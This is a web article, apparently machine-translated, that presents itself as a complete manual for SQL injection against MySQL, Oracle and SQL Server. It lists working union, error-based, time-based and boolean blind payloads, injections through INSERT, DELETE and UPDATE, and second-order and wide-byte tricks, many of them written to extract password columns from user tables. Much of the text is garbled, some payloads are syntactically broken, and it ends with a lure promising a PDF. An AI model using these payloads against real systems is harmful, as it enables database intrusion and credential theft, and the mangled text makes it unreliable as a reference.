Net most complete SQL manual injection summary! (This is enough for my collection!) There are a lot of SQL injection artifacts on the Internet, but in this era of WAF, manual injection is often very important in some real-world situations. This article is mainly to learn the knowledge to do a summary, there will be no detailed knowledge interpretation, similar to the query manual form, easy to review and refer to the future, the content of the article may be wrong, hope the master will be corrected!

0x01 Mysql Manual Injection

1.1 Joint Injection

? id=1′ order by 4–+

? Id = 0 ‘union select 1, 2, 3, the database () – +

? Id =0′ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() –+

? Id =0′ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=”users” –+ Replace #group_concat(column_name) with unhex(Hex(cast(column_name+as+char)))column_name

? Id =0 union select 1,2,3,group_concat(password) from users –+ #group_concat (‘,’,id,users,password)

? Id =0′ union select 1,2,3,password from users limit 0,1–+

1.2 Error injection

1.floor() select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.extractvalue() select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml() select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.geometrycollection() select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint() select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon() select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon() select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring() select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring() select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp() select * from test where id=1 and exp(~(select * from(select user())a)); Each error statement has its own principle:

Exp () is a mathematical function. Exp () is a mathematical function. If we take e to the x, we will get an error when we input a value greater than 709.

Updatexml () error: Since the second argument to updatexML requires an xPath-formatted string, starting with ~ is not an XML-formatted syntax, and concat() is a string concatenation function that is clearly against the rules, but will report the result of the execution in parentheses as an error so that error injection can be implemented.

Library: blasting? Id =1′ and updatexml(1,(select concat(0x7e,(schema_name),0x7e) from information_schemata limit 2,1) — +

Extraordinary:? id=1′ and updatexml(1,(select concat(0x7e,(table_name),0x7e) from information_schema.tables where Table_schema =’security’ limit 3,1) — +

Explosion field:? id=1′ and updatexml(1,(select concat(0x7e,(column_name),0x7e) from information_schema.columns where Table_name =0x7573657273 limit 2,1) — +

Explosion data:? Id =1 and updatexml(1,(select concat(0x7e,password,0x7e) from users limit 1,1),1) — +

Updatexml (1,concat(0x7e,(select password from users limit 1,1),0x7e),1)

It should be noted here that it adds concatenation characters, so that md5 can only burst 31 bits in the data, which can be segmented by the partition function:

substr(string string,num start,num length);

#string is a string,start is the starting position, and length is the length

? Id =1′ and updatexml(1,concat(0x7e, substr((select password from users limit 1,1), 0x7e),1) — +

1.3 the blinds

1.3.1 Time blind note

Time blind injection is also called delayed injection, usually using the function sleep() BENCHMARK(). You can also use cartesian product (try not to use this, too many things can be very slow).

In general time blind injection, we also need to use conditional judgment function

#if (expre1, expre2, expre3)

Expre2 is returned when expre1 is true and expre3 is returned when expre1 is false

Substr, substring, left

We like to encode the split function, but we don’t have to, because we don’t have to use quotes, and we use ASCII () hex() and so on

? Id = 1 ‘and the if (ASCII (substr (database (), 1, 1)) > 115, 1, sleep (5) – +

? Id = 1 ‘and the if ((substr ((select user ()), 1, 1) =’ r ‘), sleep (5), 1) – +

1.3.2 Boolean blind injection

? Id =1 and substr((select user(),1,1))=’r’ — +

? Id = 1 ‘and IFNULL ((substr ((select user ()), 1, 1) =’ r ‘), 0) – +

If the expression of the first parameter is NULL, the alternate value of the second parameter is returned. If the expression is not NULL, the value is output

? Id = 1 ‘and STRCMP ((substr ((select user ()), 1, 1) =’ r ‘), 1) – +

STRCMP() returns 0 if all strings are the same, -1 if the first argument is less than the second based on the current sorting order, and 1 otherwise

1.4 insert, delete, update

Insert, DELETE,update mainly use blind injection and error injection, such injection point is not recommended to use SQLMAP and other tools, will cause a lot of garbage data, generally such injection will appear in the registration, IP header, message board and other places where data needs to be written, at the same time, this injection does not report error is generally difficult to find. We can try to insert, quote, double quote, escape character \ to prevent the statement from executing properly, and then if the insert fails, the update fails, and then further test to see if there is an injection

1.4.1 error

mysql> insert into admin (id,username,password) values (2,”or updatexml(1,concat(0x7e,(version())),0) or”,”admin”); Query OK, 1 row affected (0.00 sec)

mysql> select * from admin; +——+———————————————–+———-+ | id | username | password | +——+———————————————–+———-+ | 1 | admin | admin | | 1 | and 1=1 | admin | | 2 | or updatexml(1,concat(0x7e,(version())),0) or | admin | + + — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — – + — — — — — — — — — — + 3 rows in the set (0.00 SEC)

mysql> insert into admin (id,username,password) values (2,””or updatexml(1,concat(0x7e,(version())),0) or””,”admin”); ERROR 1105 (HY000): syntax ERROR: ‘~5.5.53’

Or 1=1 Mysql > delete from admin where id =-2 or updatexML (1,concat(0x7e,(version())),0); ERROR 1105 (HY000): syntax ERROR: ‘~5.5.53’

1.4.2 the blinds

#int can use operators such as addition, subtraction, multiplication, division, and or xor shifts, etc

Mysql > insert into the admin values (2 + the if ((substr ((select user ()), 1, 1) = ‘r’), sleep (5), 1), ‘1’, “admin”); Query OK, 1 row affected (5.00 SEC)

Mysql > insert into the admin values (2 + the if ((substr ((select user ()), 1, 1) = ‘p’), sleep (5), 1), ‘1’, “admin”); Query OK, 1 row affected (0.00 SEC)

And mysql> insert into admin values (2,’ +if(substr((select user()),1,1)=’p’),sleep(5),1)+”,”admin”); Query OK, 1 row affected (0.00 SEC)

Mysql > insert into the admin values (2, “‘ + the if ((substr ((select user ()), 1, 1) = ‘r’), sleep (5), 1) +”, “admin”); Query OK, 1 row affected (5.01 SEC)

The delete function or must be false

Mysql > delete from admin where id =-2 or if(substr((select user()),1,1)=’r4′),sleep(5),0); Query OK, 0 rows affected (0.00 SEC)

Mysql > delete from admin where id =-2 or if(substr((select user()),1,1)=’r’),sleep(5),0); Query OK, 0 rows affected (5.00 SEC)

Mysql > select * from admin; +——+———-+———-+ | id | username | password | +——+———-+———-+ | 2 | 1 | admin | | 2 | 1 | Admin | | 2 | 1 | admin | | 2 | admin | admin | + — — — — — – + — — — — — — — — — – + — — — — — — — — — — + 4 rows in the set (0.00 SEC)

mysql> update admin set id=”5″+sleep(5)+”” where id=2; Query OK, 4 rows affected (20.00 sec) Rows matched: 4 Changed: 4 Warnings: 0

1.5 Secondary Injection and Wide-byte Injection Secondary injected statements: In SQL statements that are not enclosed by single quotes, we can encode them in hexadecimal so that there are no single quotes, etc.

mysql> insert into admin (id,name,pass) values (‘3′,0x61646d696e272d2d2b,’11’); Query OK, 1 row affected (0.00 sec)

mysql> select * from admin; +—-+———–+——-+ | id | name | pass | +—-+———–+——-+ | 1 | admin | admin | | 2 | admin’111 | 11111 | | 3 | admin ‘- + 11 | | + – + — — — — — — — — — — – + — — — — — – + 4 rows in the set (0.00 SEC)

Secondary injection is difficult to find in the absence of source code, usually seen in registration, after logging in to a malicious account, the database may be because of malicious account name problems, the admin’–+ mistake for admin account

Mysql encodes \ as %5c. Two bytes in a wide byte represent a Chinese character, so adding %df to %5c becomes a Chinese character “operation”

id=-1%df’ union select…

# do not use wide bytes %27 -> %5C%27

# use wide bytes %df%27 -> %df%5c%27 -> transport ‘

0x02 Oracle Manual Injection

2.1 Joint Injection

? id=-1′ union select user,null from dual–

? id=-1′ union select version,null from v$instance–

? id=-1′ union select table_name,null from (select * from (select rownum as limit,table_name from user_tables) where limit=3)–

? id=-1′ union select column_name,null from (select * from (select rownum as limit,column_name from user_tab_columns where table_name =’USERS’) where limit=2)–

? id=-1′ union select username,passwd from users–

? id=-1′ union select username,passwd from (select * from (select username,passwd,rownum as limit from users) where limit=3)–

2.2 Error Injection

? id=1′ and 1=ctxsys.drithsx.sn(1,(select user from dual))–

? id=1′ and 1=ctxsys.drithsx.sn(1,(select banner from v$version where banner like ‘Oracle%))–

? id=1′ and 1=ctxsys.drithsx.sn(1,(select table_name from (select rownum as limit,table_name from user_tables) where limit= 3))–

? id=1′ and 1=ctxsys.drithsx.sn(1,(select column_name from (select rownum as limit,column_name from user_tab_columns where table_name =’USERS’) where limit=3))–

? id=1′ and 1=ctxsys.drithsx.sn(1,(select passwd from (select passwd,rownum as limit from users) where limit=1))–

2.3 the blinds

In addition to the complex IF the else end IF function, Oracle can also use decode(). Syntax: decode(condition, value 1, return value 1, value 2, return value 2,… Value n, return value n, default);

This function has the following meanings:

IF condition = 1 THEN RETURN(1)

ELSIF condition = value 2 THEN RETURN(RETURN value 2)……

ELSIF condition = value n THEN RETURN(RETURN value n) ELSE RETURN(default value) END IF

? Id =1′ and 1=(select decode(user,’SYSTEM’,1,0,0) from dual)–

? Id =1′ and 1=(select decode(substr(user,1,1),’S’,1,0,0) from dual)–

? Id =1 and ASCII (substr(user,1,1))> 64–

2.3.2 Time blind injection

Time blind annotation can be done using the dbMS_PIpe. RECEIVE_MESSAGE(‘ any value ‘, delay time) function, which specifies the delay time

?id=1′ and 1=(case when ascii(substr(user,1,1))> 128 then DBMS_PIPE.RECEIVE_MESSAGE(‘a’,5) else 1 end)–

?id=1′ and 1=(case when ascii(substr(user,1,1))> 64 then DBMS_PIPE.RECEIVE_MESSAGE(‘a’,5) else 1 end)–

0x03 SQL Server Manual Injection

3.1 Joint Injection

? id=-1′ union select null,null–

? id=-1′ union select @@servername, @@version–

? id=-1′ union select db_name(),suser_sname()–

? id=-1′ union select (select top 1 name from sys.databases where name not in (select top 6 name from sys.databases)),null–

? id=-1′ union select (select top 1 name from sys.databases where name not in (select top 7 name from sys.databasesl),null–

? id–1′ union select (select top 1 table_ name from information_schema.tables where table_name not in (select top 0 table_name from information_schema.tables)),null–

? id=-1′ union select (select top 1 column name from information_schema.columns where table_name=’users’ and column_name not in (select top 1 column_name from information_schema.columns where table_name = ‘users’)),null—

? id=-1′ union select (select top 1 username from users where username not in (select top 3 username from users)),null–

3.2 Error injection is reported

? id=1′ and 1=(select 1/@@servername)–

? id=1′ and 1=(select 1/(select top 1 name from sys.databases where name not in (select top 1 name from sys.databases))–

3.3 the blinds

3.3.1 Boolean blind note

? Id =1′ and ASCII (substring((select db_ name(1)),1,1))> 64–

3.3.2 Time blind injection

? id= 1′; if(2>1) waitfor delay ‘0:0:5’–

? id= 1′; If (ASCII(SUBSTRING((select db_name(1)))> 64) waitfor delay ‘0:0:2’–

In addition to the need for SQL learning books (HD full color PDF) friends please pay attention to + forward private letter [SQL] to obtain information